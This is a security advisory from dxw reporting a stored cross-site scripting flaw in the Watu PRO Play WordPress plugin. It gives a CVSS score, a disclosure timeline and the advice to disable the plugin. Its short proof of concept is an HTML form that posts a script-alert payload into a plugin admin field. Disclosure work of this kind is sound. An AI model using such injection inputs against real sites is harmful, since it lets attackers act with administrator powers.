Reporter Tom Adams
Software: Watu PRO Play
Advisory report: https://security.dxw.com/advisories/stored-xss-in-watu-pro-play-allows-unauthenticated-attacker-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)
Stored XSS in Watu PRO Play allows unauthenticated attackers to do almost anything an admin can
Proof of concept
<form action=\"http://localhost/wp-admin/admin.php?page=watuproplay_levels&action=add\" method=\"POST\">
<input type=\"text\" name=\"name\" value=\"<script>alert(1)</script>\">
<input type=\"text\" name=\"ok\" value=\"1\">
Disable the plugin until a new version is released that fixes this bug
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on firstname.lastname@example.org to acknowledge this report if you received it via a third party (for example, email@example.com) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
2015-08-26: Reported to vendor by email
2015-08-26: Requested CVE
Discovered by dxw:
Please visit security.dxw.com for more information.